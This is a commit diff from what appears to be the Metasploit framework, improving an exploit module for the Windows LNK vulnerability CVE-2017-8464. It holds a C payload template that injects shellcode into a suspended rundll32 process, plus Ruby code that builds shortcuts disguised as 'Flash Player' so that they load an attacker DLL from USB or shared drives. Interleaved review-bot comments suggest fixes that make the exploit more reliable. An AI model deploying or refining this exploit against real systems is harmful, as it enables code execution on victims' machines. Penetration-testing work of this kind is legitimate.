
Merge branch 'pr9032' into upstream-master

Land #9032, Improve CVE-2017-8464 LNK exploit

Land #9032
Wei Chen
Wei Chen committed Oct 10, 2017
2 parents 88f5335 + 482ce00 commit a4bc3ea3c2c44921849df9ec01e831fead10fc75
@@ -6,11 +6,10 @@ CCx64="x86_64-w64-mingw32"
${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
${CCx64}-strip -s temp.dll -o template_x64_windows.dll
${CCx64}-strip -s temp.dll -o ../template_x64_windows.dll
rm -f temp.dll *.o
${CCx86}-gcc -c -Os template.c -Wall -shared
${CCx86}-dllwrap --def template.def *.o -o temp.dll
${CCx86}-strip -s temp.dll -o template_x86_windows.dll
${CCx86}-strip -s temp.dll -o ../template_x86_windows.dll
rm -f temp.dll *.o
@@ -22,13 +22,13 @@ BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
ExecutePayload();
break;
case DLL_PROCESS_DETACH:
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
case DLL_THREAD_DETACH:
break;
}
@@ -69,7 +69,7 @@ void ExecutePayload(void)
inline_bzero(&si, sizeof(si));
si.cb = sizeof(si);
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
// Create a suspended process, write shellcode into stack, resume it
if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
@@ -17,18 +17,23 @@ def initialize(info = {})
info,
'Name' => 'LNK Code Execution Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL.
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
that contain a dynamic icon, loaded from a malicious DLL.
This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
similar except an additional SpecialFolderDataBlock is included. The folder ID set
in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
DLL file.
If no PATH is specified, the module will use drive letters D through Z so the files
may be placed in the root path of a drive such as a shared VM folder or USB drive.
},
'Author' =>
[
'Uncredited', # vulnerability discovery
'Yorick Koster' # msf module
'Uncredited', # vulnerability discovery
'Yorick Koster', # msf module
'Spencer McIntyre' # msf module
],
'License' => MSF_LICENSE,
'References' =>
@@ -56,28 +61,30 @@ def initialize(info = {})
[ 'Windows x64', { 'Arch' => ARCH_X64 } ],
[ 'Windows x86', { 'Arch' => ARCH_X86 } ]
],
'DefaultTarget' => 0, # Default target is Automatic
'DisclosureDate' => 'Jun 13 2017'
'DefaultTarget' => 0, # Default target is Automatic
'DisclosureDate' => 'Jun 13 2017'
)
)
register_options(
[
OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']),
OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']),
OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine'])
OptString.new('PATH', [false, 'An explicit path to where the files will be hosted'])
]
)
register_advanced_options(
[
OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]),
OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
]
)
end
def exploit
path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')
arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
datastore['EXE::Path'] = path
datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")
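Review bot: The `DRIVE` option is removed from `register_options` and replaced by `PATH` with no deprecation path, so a resource script or saved config that still does `set DRIVE E:` no longer fails validation; presumably `datastore['DRIVE']` is then simply ignored and the module silently falls through to the D-through-Z branch. It would be clearer to reject the stale setting explicitly at the top of `exploit`, e.g. `fail_with(Failure::BadConfig, 'DRIVE has been replaced by PATH') if datastore['DRIVE']`, or to keep `DRIVE` registered with a description marking it deprecated. The `PATH` description could also state the expected form (a drive-rooted path, since the removed comment noted UNC paths did not work). The `exploit` method continues past the end of this hunk.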
@@ -87,14 +94,14 @@ def exploit
dll_path = store_file(dll, dll_name)
print_status("#{dll_path} created, copy it to the root folder of the target USB drive")
if datastore['DRIVE']
lnk = generate_link("#{datastore['DRIVE'].split(':')[0]}:\\#{dll_name}")
if datastore['PATH']
lnk = generate_link("#{datastore['PATH'].chomp("\\")}\\#{dll_name}")
lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk"
lnk_path = store_file(lnk, lnk_filename)
print_status("#{lnk_path} created, copy to the target USB drive")
print_status("#{lnk_path} created, copy to the target paths")
else
# HACK: the vulnerability doesn't appear to work with UNC paths
# Create LNK files to different drives instead
# HACK: Create LNK files to different drives instead
# Copying all the LNK files will likely trigger this vulnerability
('D'..'Z').each do |i|
fname, ext = (datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk").split('.')
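Review bot: `datastore['PATH'].chomp("\\")` strips only a single trailing backslash and ignores forward slashes, so a value such as `D:\\` (two trailing backslashes) or `D:/` produces a link target with a doubled or mixed separator before the DLL name. Since the link path is what the target parses, normalising all trailing separators is safer: `lnk = generate_link("#{datastore['PATH'].sub(%r{[\\/]+\z}, '')}\\#{dll_name}")`. The new status text on the next line reads oddly; `"#{lnk_path} created, copy it to the target path"` matches the DLL message above it. The enclosing `exploit` method starts and ends outside this hunk.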
@@ -108,9 +115,10 @@ def exploit
end
def generate_link(path)
vprint_status("Generating LNK file to load: #{path}")
path << "\x00"
display_name = "Flash Player\x00" # LNK Display Name
comment = "Manage Flash Player Settings\x00"
display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name
comment = datastore['LnkComment'].dup << "\x00"
# Control Panel Applet ItemID with our DLL
cpl_applet = [
